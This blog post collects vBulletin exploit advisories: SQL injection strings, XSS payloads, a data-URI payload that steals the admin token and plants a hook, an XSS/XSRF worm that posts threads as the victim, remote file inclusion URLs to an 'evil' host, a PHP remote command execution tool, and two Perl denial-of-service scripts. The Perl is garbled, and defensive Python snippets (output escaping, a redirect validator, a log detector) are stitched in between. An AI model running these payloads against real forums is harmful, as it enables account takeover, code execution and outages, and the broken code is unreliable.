Saturday, 7 April 2012

VBULLETIN EXPLOITS

Pokleyzz/vbulletin306.txt

Code:
Summary: vbulletin 3.0.6 and below php code injection
 
Description
===========
vBulletin is a powerful, scalable and fully customizable forums package
for your web site. It has been written using the Web's quickest-growing
scripting language, PHP, and is complemented with a highly efficient and
ultra fast back-end database engine built using MySQL.
 
Details
=======
Users may inject PHP code using a "nested variable" in the template name when
"Add Template Name in HTML Comments" is enabled. This option is not enabled
by default and is not recommended by vBulletin for production environments.
The problem occurs when the user can supply a partial template name through
misc.php.
 
 
Workaround
==========
Disable "Add Template Name in HTML Comments" option.
 
Proof of concept
================
http://site.com/misc.php?do=page&template={${phpinfo()}}
 
Vendor Response
===============
17th February 2005 - Vulnerability found
18th February 2005 - vbulletin developer informed
19th February 2005 - vbulletin developer confirmed
20th February 2005 - Fix Available from vbulletin team
vBulletin versions 3.0.6 and below suffer from a php code injection vulnerability.




meto5757/vbulletin-sql.txt

Code:
/****************************************/
 
CREDIT:
discovered by meto5757 and disfigure
 
PRODUCT:
vBulletin
http://www.vbulletin.com/
 
VULNERABILITY:
SQL Injection
 
NOTES:
- not a serious vulnerability, can only be used by administrator of site
- SQL injection can be used to obtain password hash
- tested on 3.6.4 and 3.6.5
 
POC:
1. Log in to admin panel
2. Go to Attachments->Search
3. Place the following string in the Attached Before field:
 
') union select 1,1,1,1,1,userid,password,1,username from user -- 9
 
greets: w4ck1ng.com
 
/****************************************
vBulletin suffers from a SQL injection flaw via the admin panel.

Liz0ziM/vbulletin352.txt 

Code:
Vulnerable Version: 3.5.2 (prior versions also may be affected)
Bug: HTML Injection (second-order cross-site scripting)
Exploitation: Remote with browser
 
 
HTML Injection: The software does not properly filter HTML tags in the title of events before they are passed to the user in 'calendar.php' & 'reminder.php' (as an include). This may allow a remote user to inject HTML/JavaScript code into calendar events. The hostile code may be rendered in the web browser of the victim user who requests a reminder for those events (persistent). For example, an attacker creates a new event (Single/All Day Event, Ranged Event or Recurring Event) with this content:
 
 
TITLE: Test<script>alert(document.cookie)</script>
BODY: No matter
OTHER OPTIONS: No matter
 
 
Demonstration XSS URL:
http://example.com/vbulletin/calendar.php?do=addreminder&e=[eventid]
 
Credit
 
Savsak.com [Ejder And The_BeKiR And Liz0Zim And CyberLord]
vBulletin version 3.5.2 is susceptible to cross site scripting attacks.

insanity/vbulletin361.txt

Code:
Author: insanity
E-mail: insanity@darkers.com.br
 
XSS vBulletin 3.6.1 Admin Control Panel
 
http://www.exemplo.com/vbulletin/admincp/index.php?do=buildnavprefs&nojs=0&prefs="><script>alert("insanity")</script>
http://www.exemplo.com/vbulletin/admincp/index.php?do=savenavprefs&nojs=0&navprefs="><script>alert("insanity")</script>

vBulletin version 3.6.1 suffers from a cross site scripting flaw in the Admin Control Panel.

imei addmimistrator/vbulletinXSSpasswd.txt

Code:
--------Summary--------
Software: vBulletin
Software's Web Site: http://www.vBulletin.com
Versions: 3.0.12-3.5.3
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Available
Discovered by: imei addmimistrator
Risk Level: Medium
-------Description-------
There is a security bug in the most powerful & common forum software vBulletin, versions 3.0.12 & 3.5.3, that allows an attacker to perform an XSS attack. The bug is the result of not sanitizing quotation marks and < & > characters in the "email" field of users' information. A weak regular expression for validating the email, which allows inserting invalid characters in the domain-name section of the email, is the source of this bug, and forgetting to htmlspecialchars the output value in the sendmsg.php file helps in exploiting this bug. A successful attack can result in theft of cookies, hijacking of pages, etc.
-------Conditions-------
Admin settings should meet these settings:
Enable Email features=Yes
Allow Users to Email Other Members=Yes
Use Secure Email Sending=No
forum/admins/options.php?do=options&dogroup=email
It seems that the conditions are OK by default;
-------Exploit-------
Scenario:
/forum/profile.php?do=editpassword
pass: your pass
email: imei@myimei.com"><script>alert(1)</script>.nomatt
Note about length limitation
****
forum/profile.php?do=editoptions
Receive Email from Other Members=yes
****
forum/sendmessage.php?do=mailmember&u={your id}
-------Solution-------
Upgrade to the vendor-provided patch.
-------Credit-------
Discovered by: imei addmimistrator
addmimistrator(4}gmail(O}com
vBulletin versions 3.0.12 through 3.5.3 are susceptible to cross site scripting.

Jessica Hope/vbulletin-adminxss.txt 

Code:
======================================================================
 
Advisory : XSS in admin logs
Release Date : July 06th 2008
Application : vBulletin
Version : vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower
Platform : PHP
Vendor URL : http://www.vbulletin.com/
Authors : Jessica Hope (jessicasaulhope@googlemail.com),
Friends who wish to remain anonymous.
 
 
=======================================================================
 
Overview
 
Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.
 
=======================================================================
 
Discussion
 
The XSS in question exists on the log viewing page of the admin control panel.
 
When a missing page is requested, a log is created in the admin area, however
the inputs to this log lack sanitation. The script name is taken from
basename(PHP_SELF), while the action is taken from _REQUEST['do']. Either one
can be used for introducing XSS vectors.
 
To highlight the severity and underline the fact that this vulnerability is
exploitable:
 
<html>
<body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<script
'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/*"
/>
<!--edit to match your data -->
<img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*"
/>
<!-- end edit -->
<img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*"
/>
<img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" />
</body>
</html>
 
You then need to send the admin to
adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1
and the XSS will render.
 
The limits on the XSS:
basename(PHP_SELF) is 50 characters max and no slashes
_REQUEST['do'] is limited to 20 characters, but no character restriction.
 
The tight character limits on the unsanitized parameters are not
mitigating the severity, as unlimited
attack space can be obtained as shown above.
 
As per my last exploits, all XSS in the vBulletin ACP can be used for
PHP injection instantly. This
is due to the design of the vBulletin hooks feature. As this
particular XSS is persistent and will
render in all major browsers it is particularly dangerous.
 
=======================================================================
 
Solution:
 
Update to vBulletin 3.7.2 PL1 or vBulletin 3.6.10 PL3
 
Don't trust PHP_SELF and sanitise all data that is going to be
displayed to the user
 
=======================================================================
vBulletin versions 3.7.2 and below and 3.6.10 PL2 and below suffer from a persistent cross site scripting flaw in the administrator logs.
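The advisory's point is that a per-field length limit on what gets logged is not a mitigation: ten short fragments are harmless one at a time and only become markup when the log viewer concatenates them into a page without escaping. The following example is added here and is not vBulletin code or the author's; it models a hypothetical log viewer with the 50- and 20-character limits quoted above, shows the unescaped rendering beside an escape-on-output rendering, and adds an allow-list for the `do` action so that unknown values are never logged verbatim. The rows and action names are constructed sample data.

```python
import html
import re

# Constructed rows in the shape the advisory describes: a script name and an
# action value, each short enough to pass a per-field length limit. Split
# across rows, the fragments only assemble into markup when the viewer
# concatenates them unescaped. Sample data, not real vBulletin log output.
SAMPLE_ROWS = [
    {"script": "faq.php", "action": "<script>/*"},
    {"script": "faq.php", "action": "*/alert(1)/*"},
    {"script": "faq.php", "action": "*/</script>"},
    {"script": "index.php", "action": "view"},
]

MAX_SCRIPT_LEN = 50   # limits quoted in the advisory
MAX_ACTION_LEN = 20

# Hypothetical allow-list of action names the viewer will display verbatim.
KNOWN_ACTIONS = {"view", "edit", "delete", "prune", "buildnavprefs"}

SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.I)


def render_log_unsafe(rows):
    """Truncate to the length limits and drop the fields straight into HTML."""
    out = []
    for row in rows:
        script = row["script"][:MAX_SCRIPT_LEN]
        action = row["action"][:MAX_ACTION_LEN]
        out.append("<tr><td>%s</td><td>%s</td></tr>" % (script, action))
    return "\n".join(out)


def render_log_safe(rows):
    """Escape every field at output time; the length limit plays no part in safety."""
    out = []
    for row in rows:
        script = html.escape(row["script"][:MAX_SCRIPT_LEN], quote=True)
        action = html.escape(row["action"][:MAX_ACTION_LEN], quote=True)
        out.append("<tr><td>%s</td><td>%s</td></tr>" % (script, action))
    return "\n".join(out)


def normalise_action(value):
    """Map a request's 'do' value onto the allow-list before it is written to the log."""
    return value if value in KNOWN_ACTIONS else "unknown"


def contains_script_tag(markup):
    """True if the rendered page carries a raw <script> or </script> tag."""
    return SCRIPT_TAG.search(markup) is not None


if __name__ == "__main__":
    print("unsafe rendering carries a script tag:", contains_script_tag(render_log_unsafe(SAMPLE_ROWS)))
    print("escaped rendering carries a script tag:", contains_script_tag(render_log_safe(SAMPLE_ROWS)))
```

Escaping at the point of output is the fix that holds regardless of how the entries were produced; the allow-list is a second, independent layer for the one field whose legitimate values are a small fixed set.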

Jessica Hope/vbulletin-xss.txt 

Code:
======================================================================
 
Advisory : Exploit for vBulletin "obscure" XSS
Release Date : June 13th 2008
Application : vBulletin
Version : vBulletin 3.7.1 and lower, vBulletin 3.6.10 and lower
Platform : PHP
Vendor URL : http://www.vbulletin.com/
Authors : Jessica Hope (jessicasaulhope@googlemail.com)
 
 
=======================================================================
 
Overview
 
Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.
 
=======================================================================
 
Discussion
 
vBulletin released PL1 for their 3.7.1 and 3.6.10 versions of vBulletin:
http://www.vbulletin.com/forum/showthread.php?t=274882
 
In the above topic they try to pass off the XSS as difficult to exploit,
with low exposure and damage. This advisory is here to detail what the
XSS is and how wrong Jelsoft are for assuming that XSS is harmless.
 
First, the discussion of exactly what the exploit is. The XSS in question
exists on the login page for the ACP (admin control panel). The login
script takes a redirect parameter that lacks sanitation, allowing a
rather easy XSS:
 
http://localhost/vB3/admincp/index.php?redirect={XSS}
 
Yes, here goes the obscure. What is even better is that the exploit will
work outright if the admin is already logged in; if the admin is not, they
will be required to log in. If you Base64-encode your attack vector using
the data: URI scheme, the XSS survives the login request and activates after
the admin is logged in. A simple example of the above:
 
http://localhost/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
 
Now to address the quote "potential for exposure and damage is limited".
Clearly Jelsoft have never seen what one can do with an XSS. In this case
you have an unlimited and unaltered XSS space, so you're free to invoke some
AJAX and have fun. Just to give ideas on how this could turn into something
larger, vBulletin has hooks that operate using eval(), and new hooks can
be added via the ACP itself. It is trivial to write some JS that not only
enables hooks but also inserts a nice RFI hook. Here's one using the data
URI:
 
data:text/html;base64,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
 O3IyPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Iik8L3NjcmlwdD4K
 
 
The above will survive a login prompt. It will then, once executed, proceed
to parse one of the ACP pages and extract the admin hash and token, then
it will enable hooks and add one that executes phpinfo().
 
In order to exploit, just get an admin to click the link. It's easier
than Jelsoft would expect...
 
=======================================================================
 
Solution
 
Per usual, update to 3.7.1 PL1 or 3.6.10 PL1
 
For the vendor, however, the solution to such things in the future is to
never call an exploit obscure, and never write "the potential for exposure
and damage is limited" when talking about an XSS. Above all, give credit where
credit is due, for there's no quicker way to piss someone off than to not give
credit. If the above was due to your PR department, then ignore them next time,
for handling exploits with PR is never a good idea.
 
=======================================================================
vBulletin versions 3.7.1 and below and 3.6.10 and below suffer from an obscure cross site scripting vulnerability.
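The login script in this advisory passes its `redirect` parameter through unchecked, which is why a `data:` URI survives the login round-trip and runs in the admin's browser. An added example of the check a defender would want there (not vBulletin's code, and not the author's) follows: it reduces any user-supplied redirect value to a same-site path and otherwise falls back to a fixed page. The host name `forum.example.com` and the fallback path are assumptions for the example.

```python
from urllib.parse import urlsplit

# Hypothetical values for this example: the forum's own host name and the page
# to return to when the requested redirect is not acceptable.
FORUM_HOST = "forum.example.com"
DEFAULT_AFTER_LOGIN = "/admincp/index.php"


def safe_redirect(target, allowed_host=FORUM_HOST, fallback=DEFAULT_AFTER_LOGIN):
    """Reduce a user-supplied redirect value to a same-site path, or return the fallback.

    Anything that could make the browser leave the site or run a non-http scheme
    (data:, javascript:, protocol-relative //host, userinfo tricks, backslash
    variants) is rejected rather than "cleaned".
    """
    if not isinstance(target, str):
        return fallback
    target = target.strip()
    if not target:
        return fallback
    # Control characters and backslashes are the raw material of parser
    # disagreements between server and browser; refuse them outright.
    if any(ord(ch) < 0x20 or ch == "\\" for ch in target):
        return fallback
    # Browsers collapse any run of leading slashes into an authority section,
    # so "//host" and "///host" are both off-site redirects.
    if target.startswith("//"):
        return fallback

    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute URL: only our own host over http(s), and keep only its path.
        if parts.scheme not in ("http", "https") or parts.hostname != allowed_host:
            return fallback
        path = parts.path or "/"
    else:
        path = parts.path

    # A bare relative path (no leading slash) is also refused: it would resolve
    # differently depending on which page issued the redirect.
    if not path.startswith("/") or path.startswith("//"):
        return fallback
    return path + ("?" + parts.query if parts.query else "")


if __name__ == "__main__":
    for candidate in ("/admincp/index.php?do=view",
                      "data:text/html;base64,PHNjcmlwdD4=",
                      "//evil.example.net/",
                      "https://forum.example.com@evil.example.net/"):
        print(repr(candidate), "->", safe_redirect(candidate))
```

The function deliberately returns only the path and query even when the input was an absolute URL for the right host, so the resulting `Location` header can never name another origin.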

Mx/vbulletin-xssxsrf.txt 

Code:
/* -----------------------------
 * Author      = Mx
 * Title       = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm
 * Software    = vBulletin
 * Addon       = Visitor Messages
 * Version     = 3.7.3
 * Attack      = XSS/XSRF
 
 - Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included
 + with the visitor messages addon (a clone of a social network wall/comment area).
 - When posting XSS, the data is run through htmlentities(); before being displayed
 + to the general public/forum members. However, when posting a new message,
 - a new notification is sent to the commentee. The commenter posts a XSS vector such as
 + <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php
 - under the domain, they are hit with an unfiltered XSS attack. XSRF is also readily available
 + and I have included an example worm that makes the user post a new thread with your own
 - specified subject and message.
 
 * Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject
 * of the attack method.
 * ----------------------------- */
 
function getNewHttpObject() {
var objType = false;
try {
objType = new ActiveXObject('Msxml2.XMLHTTP');
} catch(e) {
try {
objType = new ActiveXObject('Microsoft.XMLHTTP');
} catch(e) {
objType = new XMLHttpRequest();
}
}
return objType;
}
 
function getAXAH(url){
 
var theHttpRequest = getNewHttpObject();
theHttpRequest.onreadystatechange = function() {processAXAH();};
theHttpRequest.open("GET", url);
theHttpRequest.send(false);
 
function processAXAH(){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
 
var str = theHttpRequest.responseText;
var secloc = str.indexOf('var SECURITYTOKEN = "');
var sectok = str.substring(21+secloc,secloc+51+21);
 
var posloc = str.indexOf('posthash" value="');
var postok = str.substring(17+posloc,posloc+32+17);
 
var subject = 'subject text';
var message = 'message text';
 
postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');
 
}
}
}
}
 
 
 
 
 
 
 
 
function postAXAH(url, params) {
var theHttpRequest = getNewHttpObject();
 
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};
theHttpRequest.open("POST", url);
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');
theHttpRequest.send(params);
 
function processAXAHr(elementContainer){
if (theHttpRequest.readyState == 4) {
if (theHttpRequest.status == 200) {
 
}
}
}
}
 
 
getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');
The Visitor Messages add-on for vBulletin version 3.7.3 suffers from cross site scripting and cross site request forgery vulnerabilities. This is a worm exploit that takes advantage of these issues.

mslug/vbulletinSQL.txt 

Code:
vBulletin Forum 2.3.xx calendar.php SQL Injection
========================================================
Website: www.safechina.net
Discovered by: mslug (a1476854@hotmail.com)
 
Description:
=============
There exists a SQL injection problem in calendar.php. Notice the eventid
field.
 
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT 
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events 
WHERE eventid = $eventid");
-----------------------------------------------------
 
If the MySQL version is greater than 4.00, a UNION attack could be used.
 
Exploit request
================
calendar.php?s=&action=edit&eventid=14 union (SELECT 
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events 
WHERE eventid = 14) order by eventdate
 
(14 is the eventid of your added event)
 
The subject and event field will show the result.
 
The query_first function will only return the first row of the query result, 
so make sure it returns the
one you want.
 
The Fix?
============
Filter eventid before the query.
 
 
Disclaimer:
===========
The author is not responsible for the misuse of the information
provided in this advisory. The opinions expressed are my own and not of
any company. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of this
advisory. Any use of the information is at the user's own risk.
 
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
vBulletin Forum versions 2.3.x suffer from a SQL injection vulnerability in the calendar.php code. Remote exploitation code included.

Dr.Jr7/VBulletinImpEx.txt 

Code:
Remote File Inclusion in VBulletin ImpEx

Date: 12 / 4 / 2006

Software: VBulletin ImpEx

Version:
VBulletin 3.5.1
VBulletin 3.5.2
VBulletin 3.5.4

The bug resides in:
ImpExModule.php
ImpExController.php
ImpExDisplay.php

Exploit:

(1)
www.site.com/forum/impex/ImpExModule.php?systempath=http://www.host_evil.com/cmd?&=id

(2)
www.site.com/forum/impex/ImpExController.php?systempath=http://www.host_evil.com/cmd?&=id

(3)
www.site.com/forum/impex/ImpExDisplay.php?systempath=http://www.host_evil.com/cmd?&=id

Discovery by: Dr.Jr7

Greetz: special greet to Qptan & Mr.SNAKE & trooq
and to all my friends in www.lezr.com/vb

see u :}
VBulletin ImpEx suffers from a remote file inclusion vulnerability. POC included.

Hasadya Raed/vbulletin365-rfi.txt 

Code:
By Hasadya Raed
Contact : RaeD (at) BsdMail (dot) Com [email concealed] - Israel
Greetz : -Fairoz- 
-----------------------------------
vBulletin v3.6.5
Dork : "Powered by vBulletin v3.6.5. Copyright ©2000 - 2007 "
-----------------------------------
Exploits :
 
Http://WWW.Victim.Com/vb/includes/functions.php?classfile=[Shell-Attack]

Http://WWW.Victim.Com/vb/includes/functions_cron.php?nextitem=[Shell-Attack]

Http://WWW.Victim.Com/vb/includes/functions_forumdisplay.php?specialtemplates=[Shell-Attack]

Discovered By Hasadya Raed
Have A Good Time
vBulletin version 3.6.5 suffers from remote file inclusion vulnerabilities.

HACKERS PAL/Vbulletin-2.x.txt 

Code:
Hello,
 
Vbulletin 2.X sql injection
 
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net
 
This is sql injection in vbulletin systems
 
the injection is in the global.php file
 
we can use it 
 
global.php?templatesused=))/*
 
the query will be 
SELECT template,title FROM template WHERE (title IN ('))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid
 
global.php?templatesused=nn,dd,'))/*
SELECT template,title FROM template WHERE (title IN ('nn','dd','\\\'))/*','gobutton','timezone','username_loggedout','username_loggedin','phpinclude','headinclude','header','footer','forumjumpbit','forumjump','nav_linkoff','nav_linkon','navbar','nav_joiner','pagenav','pagenav_curpage','pagenav_firstlink','pagenav_lastlink','pagenav_nextlink','pagenav_pagelink','pagenav_prevlink') AND (templatesetid=-1 OR templatesetid=1)) ORDER BY templatesetid
 
It Can be used as shell injection
 
Tested on VB 2.3.X and other versions are injected ..(2.X)
 
#WwW.SoQoR.NeT
Vbulletin 2.X suffers from a flaw in global.php that allows for SQL injection.

ReZEN/vBulletin174.txt

Code:
=======================================================================================
XOR Crew :: Security Advisory 
       3/22/2006
=======================================================================================
vBulletin ImpEx <= 1.74 - Remote Command Execution Vulnerability
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=======================================================================================
 
:: Summary
 
       Vendor       :  vBulletin
       Vendor Site  :  http://www.vbulletin.com/docs/html/impex
       Product(s)   :  Impex - vBulletin Import / Export System
       Version(s)   :  All
       Severity     :  Medium/High
       Impact       :  Remote Command Execution
       Release Date :  3/22/2006
       Credits      :  ReZEN (rezen (a) xorcrew (.) net)
 
=======================================================================================
 
I. Description
 
The ImpEx (Import / Export) system is the core system for importing from 
other forum software into vBulletin version 3.5.0 or higher.
 
=======================================================================================
 
II. Synopsis
 
There is a remote file inclusion vulnerability that allows for remote 
command execution in the /ImpExData.php file.  The bug is here:
 
require_once ($systempath . 'impex/ImpExDatabase.php');
 
the $systempath variable is not set prior to being used in the 
require_once() function. The vendor and support team have been contacted.
 
=======================================================================================
 
Exploit code:
 
-----BEGIN-----
 
<?php
/*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN
 
example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl:http://www.pwn3d.com/evil.txt?
 
*/
 
$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];
 
$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
     ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" 
value=\"".$turl."\"><br>"
     ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" 
value=\"".$hurl."\"><br>"
     ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" 
value=\"".$cmd."\"><br>"
     ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
 
     ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";
 
if (!isset($_POST['submit']))
{
 
echo $form;
 
}else{
 
$file = fopen ("test.txt", "w+");
 
fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);
 
$file = fopen ($turl.$hurl, "r");
if (!$file) {
     echo "<p>Unable to get output.\n";
     exit;
}
 
echo $form;
 
while (!feof ($file)) {
     $line .= fgets ($file, 1024)."<br>";
     }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
 
}
?>
 
 
------END------
 
=======================================================================================
 
IV. Greets :>
 
All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.
 
uh ohs!! + /srv/web/lotfree/ + LOTFREE uid 1010 = Lame Frenchies
 
=======================================================================================
Versions 1.74 and below of the ImpEx module for vBulletin are susceptible to a remote command execution vulnerability. Exploit included.
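Several of the advisories on this page share one request shape: a query parameter whose value is something it should never be, a URL (the ImpEx and includes/ file-inclusion reports above), PHP nested-variable syntax (the misc.php template injection at the top of the page) or a UNION clause (the calendar.php injection). The following detector is an added example, not code from any of the advisories or from vBulletin: it parses Common Log Format lines, percent-decodes every query parameter and applies one rule per shape. The log lines are constructed sample data using documentation IP ranges; the rule names and record layout are assumptions for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines in Common Log Format (not captured from any real
# server). The query strings mirror the request shapes the advisories above
# describe; the IP addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Apr/2012:10:00:01 +0000] "GET /forum/misc.php?do=page&template=%7B%24%7Bphpinfo%28%29%7D%7D HTTP/1.1" 200 512
203.0.113.5 - - [07/Apr/2012:10:00:02 +0000] "GET /forum/impex/ImpExData.php?systempath=http://198.51.100.7/evil.txt? HTTP/1.1" 200 77
198.51.100.9 - - [07/Apr/2012:10:00:03 +0000] "GET /forum/calendar.php?s=&action=edit&eventid=14%20union%20(SELECT%20version()) HTTP/1.1" 200 2048
192.0.2.44 - - [07/Apr/2012:10:00:04 +0000] "GET /forum/showthread.php?t=274882&page=2 HTTP/1.1" 200 9123
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule is applied to the fully decoded value of every query parameter.
RULES = [
    # a value that is itself a URL: the remote-file-inclusion shape (systempath=http://...)
    ("rfi", re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.I)),
    # PHP nested-variable syntax, as in template={${...}}
    ("php_var_injection", re.compile(r"\{\s*\$")),
    # UNION-based SQL injection in a parameter that should be a plain value
    ("sqli_union", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
]


def parse_line(line):
    """Return the request fields of one log line, or None if it does not parse."""
    match = LOG_LINE.match(line)
    return match.groupdict() if match else None


def decoded_params(target):
    """Yield (name, value) for every query parameter, percent-decoded a second
    time so that a double-encoded payload is inspected in its final form."""
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        yield name, unquote(value)


def inspect_target(target):
    """Return [(rule_name, param_name), ...] for every rule a parameter trips."""
    hits = []
    for name, value in decoded_params(target):
        for rule_name, pattern in RULES:
            if pattern.search(value):
                hits.append((rule_name, name))
    return hits


def scan(log_text):
    """Scan a whole log; return one record per line that tripped at least one rule."""
    findings = []
    for line in log_text.splitlines():
        fields = parse_line(line)
        if fields is None:
            continue
        hits = inspect_target(fields["target"])
        if hits:
            findings.append({"ip": fields["ip"], "ts": fields["ts"],
                             "target": fields["target"], "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["hits"], finding["target"])
```

Decoding before matching matters: the first sample line carries its braces and dollar sign percent-encoded, so a rule applied to the raw request line would miss it. Matching on parameter values rather than on the whole URL also keeps the `t=`/`page=` request at the end from producing noise.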

Jim Salim/vBulletin DOS - all version

Perl code:
# DOS Vbulletin 92% Works ;)
#
# Tested on all versions! and can DOS the server
#
#Perl Script 
use Socket;
if (@
ARGV 2) { &usage $rand=rand(10); $host $ARGV[0]; $dir $ARGV[1]; $host =~ s/(http://)//eg; for ($i=0$i<10$i--)
$user="vb".$rand.$i$data "s=" $len length $data$foo "POST ".$dir."index.php HTTP/1.1\r\n""Accept: */*\r\n""Accept-Language: en-gb\r\n""Content-Type: application/x-www-form-urlencoded\r\n""Accept-Encoding: gzip, deflate\r\n""User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n""Host: $host\r\n""Content-Length: $len\r\n""Connection: Keep-Alive\r\n""Cache-Control: no-cache\r\n\r\n""$data"my $port "80"my $proto getprotobyname('tcp'); socket(SOCKETPF_INETSOCK_STREAM$proto); connect(SOCKETsockaddr_in($portinet_aton($host))) || redosend(SOCKET,"$foo"0); syswrite STDOUT"+" ;
}
print 
"\n\n"system('ping $host'); sub usage {
print 
"\tusage: \n";
print 
"\t$0 <host> </dir/>\n";
print 
"\tex: $0 127.0.0.1 /forum/\n";
print 
"\tex2: $0 127.0.0.1 /\n\n";
exit();
};  
R3d-D3V!L/vBulletin Denial of Service Vulnerability 

Perl code:
#!/c:/perl/bin
#

# VBulletin Denial of Service Exploit by 4.!.5
#
# created : !N 7h3 DARKNESS
# CODED BY: R3d-D3V!L
#
# important => Image Verification in (search.php) is NOT Enabled.
# Tested on V3.6.3
#
#Perl Script 
use Socket;
if (@
ARGV 2) { &usage $rand=rand(10); $host $ARGV[0]; $dir $ARGV[1]; $host =~ s/(http://)//eg; for ($i=0$i<10$i--)
$user="vb".$rand.$i$data "s=" $len length $data$foo "POST ".$dir."index.php HTTP/1.1\r\n""Accept: */*\r\n""Accept-Language: en-gb\r\n""Content-Type: application/x-www-form-urlencoded\r\n""Accept-Encoding: gzip, deflate\r\n""User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n""Host: $host\r\n""Content-Length: $len\r\n""Connection: Keep-Alive\r\n""Cache-Control: no-cache\r\n\r\n""$data"my $port "80"my $proto getprotobyname('tcp'); socket(SOCKETPF_INETSOCK_STREAM$proto); connect(SOCKETsockaddr_in($portinet_aton($host))) || redosend(SOCKET,"$foo"0); syswrite STDOUT"+" ;
}
print 
"\n\n"system('ping $host'); sub usage {
print 
"\tusage: \n";
print 
"\t$0 <host> </dir/>\n";
print 
"\tex: $0 127.0.0.1 /forum/\n";
print 
"\tex2: $0 127.0.0.1 /\n\n";
exit();
}; 
# Exploit By 4.!.5...




######################################################

  
[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}----------------------------------

[~] 
Greetz tOdolly L!TTLE 547r 0r45hy DEV!L_MODY po!S!ON Sc0rp!0N mAG0ush_1987
  
